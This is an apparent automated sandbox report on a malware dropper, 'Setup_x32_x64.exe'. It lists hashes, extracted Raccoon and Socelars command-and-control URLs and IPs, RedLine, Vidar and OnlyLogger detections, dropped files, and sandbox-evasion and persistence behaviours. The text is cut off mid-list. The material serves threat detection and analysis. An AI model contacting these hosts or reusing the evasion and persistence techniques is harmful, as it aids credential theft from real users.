Analysis
-
max time kernel
1825s -
max time network
1835s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
02-02-2022 13:26
Static task
static1
Behavioral task
behavioral1
Sample
Setup_x32_x64.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
Setup_x32_x64.exe
Resource
win10-en-20211208
Behavioral task
behavioral3
Sample
Setup_x32_x64.exe
Resource
win10v2004-en-20220112
Behavioral task
behavioral4
Sample
Setup_x32_x64.exe
Resource
win11-en-20220120
General
-
Target
Setup_x32_x64.exe
-
Size
2.5MB
-
MD5
5f7f42f26f25e4e7342c00e05c0176fa
-
SHA1
582ea6aa20547c8b7f83ceccba5b3b4b1e7e4fb7
-
SHA256
9e719c4dd5e1086d5197fded7b8cdb0d3d592c0636b0d469fcda22c9723e8e7c
-
SHA512
887d80f3993cbd19114388aaa329ecfd7ff9eb7767b5fa1df88245155d9eca42d0756bd4297686666dcae49d9e9374dfc40d0cf86f71d444d572706ef036663c
Malware Config
Extracted
socelars
http://www.kvubgc.com/
Extracted
raccoon
1.8.5
97440559aa600fdf11b5d973d306af5470f07592
-
url4cnc
http://188.166.1.115/capibar
http://91.219.236.139/capibar
http://194.180.174.147/capibar
http://185.3.95.153/capibar
http://185.163.204.22/capibar
https://t.me/capibar
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3188 2880 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 19 IoCs
Processes:
resource yara_rule behavioral3/memory/1292-159-0x0000000000290000-0x00000000002FD000-memory.dmp family_redline behavioral3/memory/1292-248-0x0000000000290000-0x00000000002FD000-memory.dmp family_redline behavioral3/memory/2624-444-0x0000000000960000-0x0000000000B15000-memory.dmp family_redline behavioral3/memory/3012-443-0x00000000001E0000-0x0000000000325000-memory.dmp family_redline behavioral3/memory/3344-441-0x00000000006E0000-0x0000000000891000-memory.dmp family_redline behavioral3/memory/3000-440-0x0000000000500000-0x000000000064C000-memory.dmp family_redline behavioral3/memory/4108-442-0x00000000008A0000-0x00000000008F5000-memory.dmp family_redline behavioral3/memory/3012-483-0x00000000001E0000-0x0000000000325000-memory.dmp family_redline behavioral3/memory/3000-484-0x0000000000500000-0x000000000064C000-memory.dmp family_redline behavioral3/memory/3000-482-0x0000000000500000-0x000000000064C000-memory.dmp family_redline behavioral3/memory/3012-481-0x00000000001E0000-0x0000000000325000-memory.dmp family_redline behavioral3/memory/3344-474-0x00000000006E0000-0x0000000000891000-memory.dmp family_redline behavioral3/memory/4108-470-0x00000000008A0000-0x00000000008F5000-memory.dmp family_redline behavioral3/memory/3344-469-0x00000000006E0000-0x0000000000891000-memory.dmp family_redline behavioral3/memory/2624-471-0x0000000000960000-0x0000000000B15000-memory.dmp family_redline behavioral3/memory/4108-466-0x00000000008A0000-0x00000000008F5000-memory.dmp family_redline behavioral3/memory/3668-525-0x0000000000750000-0x000000000088F000-memory.dmp family_redline behavioral3/memory/3668-538-0x0000000000750000-0x000000000088F000-memory.dmp family_redline behavioral3/memory/3668-540-0x0000000000750000-0x000000000088F000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\askinstall49.exe family_socelars C:\Users\Admin\AppData\Local\Temp\askinstall49.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 12 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeJJujxgo.exeWerFault.exeWerFault.exedescription pid process target process PID 2508 created 2616 2508 WerFault.exe IvsskHJfubsqZ5nFS_xpOLRK.exe PID 1012 created 4140 1012 WerFault.exe Sm_lvl2URwt3bkdpYbN6ppsk.exe PID 3968 created 4148 3968 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe PID 1884 created 4148 1884 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe PID 5804 created 4148 5804 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe PID 4788 created 2536 4788 WerFault.exe UPLs6tY8WjwSKiXVW8fL8JqY.exe PID 4388 created 4148 4388 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe PID 1188 created 5448 1188 WerFault.exe c8543649-03e9-461c-bb64-bc5598521773.exe PID 4568 created 3660 4568 WerFault.exe EJegy7njpw4NcGC4TPkpQFA9.exe PID 4208 created 4148 4208 JJujxgo.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe PID 3720 created 4148 3720 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe PID 5672 created 4148 5672 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe -
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral3/memory/4108-442-0x00000000008A0000-0x00000000008F5000-memory.dmp net_reactor behavioral3/memory/4108-470-0x00000000008A0000-0x00000000008F5000-memory.dmp net_reactor behavioral3/memory/4108-466-0x00000000008A0000-0x00000000008F5000-memory.dmp net_reactor -
OnlyLogger Payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/4148-491-0x0000000000400000-0x000000000048D000-memory.dmp family_onlylogger behavioral3/memory/4148-490-0x0000000000500000-0x0000000000544000-memory.dmp family_onlylogger -
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral3/memory/2516-494-0x0000000002130000-0x00000000021D5000-memory.dmp family_vidar behavioral3/memory/2516-495-0x0000000000400000-0x00000000004CE000-memory.dmp family_vidar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exerundll32.exeflow pid process 360 4136 powershell.exe 457 1404 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 38 IoCs
Processes:
Proxyupd.exeFolder.exeRobCleanerInstl3183813.exesoft.exeaskinstall49.exeFolder.exeFile.exe48b85f34-ba76-4a43-8811-51001d013e78.exe8ZCfgm0NuWkp7PKQifskxkTL.exeLzWgYoMzjeu0S_yZPBZpgsk3.exe1BwX9cFBeToivHJC1osbHAsz.exeP1YB1hAG63Ao1gEROgD7fk7o.exeImMSMmAqtHpIJOu_JPRVxsxL.exeIvsskHJfubsqZ5nFS_xpOLRK.exe9hvXSXrdixXuUYtM4HT7kFel.exeVdcmpLWQ4sQClzr_v_nHf2ng.exeUPLs6tY8WjwSKiXVW8fL8JqY.exePSJX3kTgFrzS6xbKJXjbH2XR.exeNROUveYetDLp89YeLjvoyKcP.exeT4GuP5xLZ5KygBfWzf7jpOvR.exeMFPmIIhwR3njJSHvNPzgPYo6.exeZh3M5OU4FZcI7PVNDwUeCUKJ.exePhK8unYY2mmDRFfEIEhrxgqj.exebeb9YTbvJFLvLXX592jpxOvD.exeDzNmPWdwKQwiMdPEyWA0pWIZ.exeSm_lvl2URwt3bkdpYbN6ppsk.exedhgUgg1lwzVFLeDAWWwO2YJd.exeEJegy7njpw4NcGC4TPkpQFA9.exeImMSMmAqtHpIJOu_JPRVxsxL.exe1.exego-memexec-2546849896.exeInstall.exeInstall.exe93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exejg1_1faf.exec8543649-03e9-461c-bb64-bc5598521773.exeJJujxgo.exeIbyOOzs.exepid process 3716 Proxyupd.exe 3200 Folder.exe 2440 RobCleanerInstl3183813.exe 1292 soft.exe 3372 askinstall49.exe 1868 Folder.exe 3476 File.exe 3980 48b85f34-ba76-4a43-8811-51001d013e78.exe 2928 8ZCfgm0NuWkp7PKQifskxkTL.exe 4100 LzWgYoMzjeu0S_yZPBZpgsk3.exe 4116 1BwX9cFBeToivHJC1osbHAsz.exe 4124 P1YB1hAG63Ao1gEROgD7fk7o.exe 4132 ImMSMmAqtHpIJOu_JPRVxsxL.exe 2616 IvsskHJfubsqZ5nFS_xpOLRK.exe 2516 9hvXSXrdixXuUYtM4HT7kFel.exe 4108 VdcmpLWQ4sQClzr_v_nHf2ng.exe 2536 UPLs6tY8WjwSKiXVW8fL8JqY.exe 2624 PSJX3kTgFrzS6xbKJXjbH2XR.exe 3000 NROUveYetDLp89YeLjvoyKcP.exe 3344 T4GuP5xLZ5KygBfWzf7jpOvR.exe 3012 MFPmIIhwR3njJSHvNPzgPYo6.exe 3220 Zh3M5OU4FZcI7PVNDwUeCUKJ.exe 320 PhK8unYY2mmDRFfEIEhrxgqj.exe 368 beb9YTbvJFLvLXX592jpxOvD.exe 3752 DzNmPWdwKQwiMdPEyWA0pWIZ.exe 4140 Sm_lvl2URwt3bkdpYbN6ppsk.exe 4148 dhgUgg1lwzVFLeDAWWwO2YJd.exe 3660 EJegy7njpw4NcGC4TPkpQFA9.exe 4976 ImMSMmAqtHpIJOu_JPRVxsxL.exe 3668 1.exe 4996 go-memexec-2546849896.exe 4460 Install.exe 3236 Install.exe 4724 93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe 5324 jg1_1faf.exe 5448 c8543649-03e9-461c-bb64-bc5598521773.exe 4208 JJujxgo.exe 4988 IbyOOzs.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Setup_x32_x64.exeFolder.exeRobCleanerInstl3183813.exe9hvXSXrdixXuUYtM4HT7kFel.exe1BwX9cFBeToivHJC1osbHAsz.exedhgUgg1lwzVFLeDAWWwO2YJd.exeIbyOOzs.exeFile.exeEJegy7njpw4NcGC4TPkpQFA9.exeInstall.exeZh3M5OU4FZcI7PVNDwUeCUKJ.exeDzNmPWdwKQwiMdPEyWA0pWIZ.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation Setup_x32_x64.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation Folder.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation RobCleanerInstl3183813.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 9hvXSXrdixXuUYtM4HT7kFel.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 1BwX9cFBeToivHJC1osbHAsz.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation dhgUgg1lwzVFLeDAWWwO2YJd.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation IbyOOzs.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation File.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation EJegy7njpw4NcGC4TPkpQFA9.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation Zh3M5OU4FZcI7PVNDwUeCUKJ.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation DzNmPWdwKQwiMdPEyWA0pWIZ.exe -
Loads dropped DLL 8 IoCs
Processes:
beb9YTbvJFLvLXX592jpxOvD.exe9hvXSXrdixXuUYtM4HT7kFel.exerundll32.exerundll32.exerundll32.exepid process 368 beb9YTbvJFLvLXX592jpxOvD.exe 2516 9hvXSXrdixXuUYtM4HT7kFel.exe 2516 9hvXSXrdixXuUYtM4HT7kFel.exe 5424 rundll32.exe 5424 rundll32.exe 4984 rundll32.exe 4984 rundll32.exe 1404 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg1_1faf.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe -
Drops Chrome extension 2 IoCs
Processes:
IbyOOzs.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json IbyOOzs.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json IbyOOzs.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
IbyOOzs.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini IbyOOzs.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 56 ipinfo.io 57 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 33 IoCs
Processes:
powershell.exeIbyOOzs.exeInstall.exeJJujxgo.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IbyOOzs.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol JJujxgo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA7D265139F17241687E79703FE04A16 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA7D265139F17241687E79703FE04A16 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 IbyOOzs.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_13BE91B3726C56FE2616E67BB40B189C IbyOOzs.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C15B120C7F4EE6F1182923868E66174B IbyOOzs.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini JJujxgo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_2B2BCCF5DEF5DB0836949F960BC55B50 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_13BE91B3726C56FE2616E67BB40B189C IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_2B2BCCF5DEF5DB0836949F960BC55B50 IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IbyOOzs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C15B120C7F4EE6F1182923868E66174B IbyOOzs.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
Processes:
soft.exe48b85f34-ba76-4a43-8811-51001d013e78.exePSJX3kTgFrzS6xbKJXjbH2XR.exeT4GuP5xLZ5KygBfWzf7jpOvR.exeMFPmIIhwR3njJSHvNPzgPYo6.exeLzWgYoMzjeu0S_yZPBZpgsk3.exeNROUveYetDLp89YeLjvoyKcP.exeVdcmpLWQ4sQClzr_v_nHf2ng.exe1.exejg1_1faf.exepid process 1292 soft.exe 3980 48b85f34-ba76-4a43-8811-51001d013e78.exe 2624 PSJX3kTgFrzS6xbKJXjbH2XR.exe 3344 T4GuP5xLZ5KygBfWzf7jpOvR.exe 3012 MFPmIIhwR3njJSHvNPzgPYo6.exe 4100 LzWgYoMzjeu0S_yZPBZpgsk3.exe 3000 NROUveYetDLp89YeLjvoyKcP.exe 4108 VdcmpLWQ4sQClzr_v_nHf2ng.exe 3668 1.exe 5324 jg1_1faf.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ImMSMmAqtHpIJOu_JPRVxsxL.exedescription pid process target process PID 4132 set thread context of 4976 4132 ImMSMmAqtHpIJOu_JPRVxsxL.exe ImMSMmAqtHpIJOu_JPRVxsxL.exe -
Drops file in Program Files directory 25 IoCs
Processes:
jg1_1faf.exeIbyOOzs.exeZh3M5OU4FZcI7PVNDwUeCUKJ.exe1BwX9cFBeToivHJC1osbHAsz.exedescription ioc process File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW jg1_1faf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files (x86)\bQZEOuyekqRU2\tiwkFfV.xml IbyOOzs.exe File created C:\Program Files (x86)\GuXKuCyCeSmjC\JbtXKws.xml IbyOOzs.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IbyOOzs.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja IbyOOzs.exe File created C:\Program Files (x86)\GuXKuCyCeSmjC\vjUmvVB.dll IbyOOzs.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\1f85c699-401a-4fd4-aa82-1579b719b752.tmp Zh3M5OU4FZcI7PVNDwUeCUKJ.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 1BwX9cFBeToivHJC1osbHAsz.exe File created C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb jg1_1faf.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files (x86)\uAhcATovcXckvYCnvyR\QQyeJnA.xml IbyOOzs.exe File created C:\Program Files (x86)\lSmWvXKKfqUn\lUgUjNV.dll IbyOOzs.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220202143203.pma Zh3M5OU4FZcI7PVNDwUeCUKJ.exe File created C:\Program Files (x86)\wjTkFrExU\UukAkJ.dll IbyOOzs.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IbyOOzs.exe File created C:\Program Files (x86)\bQZEOuyekqRU2\zUQuykzARkAJr.dll IbyOOzs.exe File created C:\Program Files (x86)\uAhcATovcXckvYCnvyR\cIdNPcP.dll IbyOOzs.exe File created C:\Program Files (x86)\wjTkFrExU\aftshtn.xml IbyOOzs.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe 1BwX9cFBeToivHJC1osbHAsz.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 1BwX9cFBeToivHJC1osbHAsz.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi IbyOOzs.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi IbyOOzs.exe -
Drops file in Windows directory 6 IoCs
Processes:
schtasks.exesvchost.exeWerFault.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\pyIEiyMuPIzAvWAZz.job schtasks.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Tasks\bnkqNuphAZeBTHhYMc.job schtasks.exe File created C:\Windows\Tasks\LMrvZmpowwChRBgra.job schtasks.exe File created C:\Windows\Tasks\WcTeBRgOXLrCFSZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5876 4140 WerFault.exe Sm_lvl2URwt3bkdpYbN6ppsk.exe 5864 2616 WerFault.exe IvsskHJfubsqZ5nFS_xpOLRK.exe 6060 4148 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe 3548 2536 WerFault.exe UPLs6tY8WjwSKiXVW8fL8JqY.exe 1080 4148 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe 5760 5448 WerFault.exe c8543649-03e9-461c-bb64-bc5598521773.exe 4876 3660 WerFault.exe EJegy7njpw4NcGC4TPkpQFA9.exe 4888 4148 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe 6112 4148 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe 5280 4148 WerFault.exe dhgUgg1lwzVFLeDAWWwO2YJd.exe -
Checks processor information in registry 2 TTPs 36 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
9hvXSXrdixXuUYtM4HT7kFel.exeWerFault.exeWerFault.exe93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeMusNotifyIcon.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 9hvXSXrdixXuUYtM4HT7kFel.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz MusNotifyIcon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 9hvXSXrdixXuUYtM4HT7kFel.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MusNotifyIcon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried 